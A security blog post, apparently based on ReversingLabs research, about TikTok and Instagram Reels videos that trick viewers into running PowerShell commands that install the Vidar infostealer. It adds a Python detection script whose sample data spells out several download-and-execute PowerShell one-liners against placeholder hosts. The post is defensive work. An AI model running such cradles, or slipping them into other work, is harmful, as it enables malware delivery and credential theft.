Phishing Attacks Leverage TikTok, Instagram Reels

Short-form videos on social media apps are currently being leveraged by threat actors as a phishing vector, utilizing tutorial-style content with the promise of free premium software to lure victims onto malicious sites. This is an important threat to be aware of, as the videos can trick users into directly downloading malware. ReversingLabs (RL) analyzed two distinct campaigns that managed to reach a large audience by leveraging different metrics to game the content recommendation algorithms. Unfortunately, the algorithm and your trust in social media have signed you up for malware, with the likes of Vidarstealer on the table. 🚨

During RL researchers’ investigation of malicious social media videos, two different lure techniques were observed across accounts and platforms. Primarily conducted on TikTok and Instagram Reels, these campaigns use the same template to mass-produce videos and make regular posts. One methodology involves fake tutorials for software installs, featuring professional-sounding voiceovers and clean graphics. The second approach relies on posts demonstrating how to use premium software for free, spanning multiple videos, with a centralized tutorial introduced after the account gains traction. Regardless of the differing hooks, both campaign tactics seek to drive viewers to a secondary website hosting free software of dubious intent.

The malicious tutorial campaigns come from a myriad of almost identical accounts, with usernames like “windows.tips” or “windows.insights” and the same blue and white profile picture. This color palette mirrors the legitimate Windows social media account’s icon, which may help establish credibility for the malicious account. In one example, a potentially AI-generated voice reads out simple directions to unlock Spotify Premium. The video shows users step by step how to open PowerShell from the Windows menu and what command to input to supposedly unlock this free service. The command downloads scripts hosted at the specified address, and some users may believe msget[.]run/spotify is a Microsoft-affiliated or otherwise legitimate domain. Attackers are relying on this lack of understanding. What makes the video dangerous is how clean and professional it appears, creating a false sense of authority. Saving is a highly valued interaction on posts, and it causes the platform’s algorithm to push the content to more users. The fact that the video has nearly 200 more saves than likes shows that threat actors are targeting the more algorithmically valuable form of engagement.
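The lure above hinges on a victim typing a download-and-execute one-liner into an interactive PowerShell console. Because the command is typed rather than passed on a process command line, a process-creation event for powershell.exe launched from the Start menu carries no useful arguments; the text only appears in PowerShell Script Block Logging (Event ID 4104) or the console history. The following detection sketch is an added example written for this post, not ReversingLabs code or anything from the campaign. It assumes 4104-shaped records with a `ScriptBlockText` field and a `Path` field that is empty for interactively typed blocks; the sample records and the `.invalid` placeholder domain are constructed, and the actual command shown in the video is not reproduced.

```python
import re

# Constructed sample records shaped like Event ID 4104 script block log entries.
# "Path" is empty when the block was typed into an interactive console, which is
# exactly the situation the video tutorial creates. Domains are RFC 2606 placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    {"ScriptBlockText": "irm http://download.invalid/spotify | iex", "Path": ""},
    {"ScriptBlockText": "iex ((New-Object Net.WebClient).DownloadString('https://download.invalid/x'))",
     "Path": ""},
    {"ScriptBlockText": r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB",
     "Path": r"C:\Scripts\cleanup.ps1"},
    {"ScriptBlockText": r"Invoke-WebRequest https://download.invalid/build.exe -OutFile $env:TEMP\build.exe; "
                        r"Start-Process $env:TEMP\build.exe", "Path": ""},
    {"ScriptBlockText": "Invoke-WebRequest https://docs.invalid/readme.txt -OutFile readme.txt", "Path": ""},
    {"ScriptBlockText": r"iex (Get-Content .\profile_snippet.ps1 -Raw)", "Path": ""},
]

# Cmdlets, aliases and .NET members that fetch remote content. curl/wget are
# Windows PowerShell aliases for Invoke-WebRequest.
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
    r"downloadstring|downloadfile|downloaddata|start-bitstransfer)\b", re.I)
# Ways fetched content or a dropped file gets executed.
EXECUTE_RE = re.compile(r"\b(?:iex|invoke-expression|start-process|saps)\b", re.I)
URL_RE = re.compile(r"\bhttps?://[^\s'\"()]+", re.I)


def classify(block: dict) -> dict:
    """Return the download/execute/URL triad, a severity and whether the block
    was typed interactively (empty Path), so an analyst can triage quickly."""
    text = " ".join(block["ScriptBlockText"].split())  # normalise whitespace
    download = bool(DOWNLOAD_RE.search(text))
    execute = bool(EXECUTE_RE.search(text))
    urls = URL_RE.findall(text)
    if download and urls and execute:
        severity = "high"      # classic download cradle: fetch remote code, run it
    elif download and urls:
        severity = "medium"    # remote fetch without an execute step in the same block
    else:
        severity = "none"      # local-only activity, or no remote source
    return {
        "severity": severity,
        "download": download,
        "execute": execute,
        "urls": urls,
        "interactive": block.get("Path", "") == "",
    }


def triage(blocks) -> list:
    """Keep only the blocks worth a look, preserving log order."""
    return [r for r in (classify(b) for b in blocks) if r["severity"] != "none"]


if __name__ == "__main__":
    for hit in triage(SAMPLE_SCRIPT_BLOCKS):
        print(hit["severity"].upper(), "interactive" if hit["interactive"] else "script",
              ", ".join(hit["urls"]))
```

The URLs the rule extracts are the pivot for the rest of the response: the hosts can be checked against proxy and DNS logs for other users who followed the same video, and a hit with `interactive` set to true is a strong sign that a person, not a scheduled script, was socially engineered into typing the command. The pattern list is deliberately plain; obfuscated cradles (string concatenation, backtick-split cmdlet names, encoded commands) need either the deobfuscated text that 4104 already provides for many cases or additional normalisation before matching.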

Researchers extracted the executable at the msget[.]run/spotify domain and used ReversingLabs Spectra Analyze for a deeper look. The build.exe file delivered through this command is identified as Vidarstealer, confirming other reports of this phenomenon. Vidarstealer is a popular infostealer sold as malware-as-a-service (MaaS) that steals credentials, financial information, and tokens from victims. It is a long-standing malware family that was updated in October of last year, making it more evasive and stable. Its use spans a variety of campaigns, such as fake game cheats, malvertising, and more. The attackers deploying this malware seem to be targeting a variety of demographics and regions, with many targets being individual users.

The second type of video found takes a completely different approach. The focus is short videos blasting trending music while scrolling through the features of premium software. These vague videos prompt viewers to ask how the poster was able to get free access to the program, and attackers exploit this curiosity, and the trust behind it, by replying with directions to dangerous sites. If not using the comment-reply approach, they redirect users to a separate tutorial video or a link in their account description, in order to funnel victims to malicious sites. These are links to sites advertised as hosting the free software downloads. Some of these sites have been taken down; researchers were able to explore one now-inactive site using Spectra Analyze’s Interactive Sandbox. Regardless of any payload delivery, it’s clear these techniques can be used to drive traffic to any site, which can easily be something dangerous. By using multiple platforms, accounts, and posts, attackers are able to reach many users.

For more details, check out the full article.

This post is licensed under CC BY 4.0 by the author.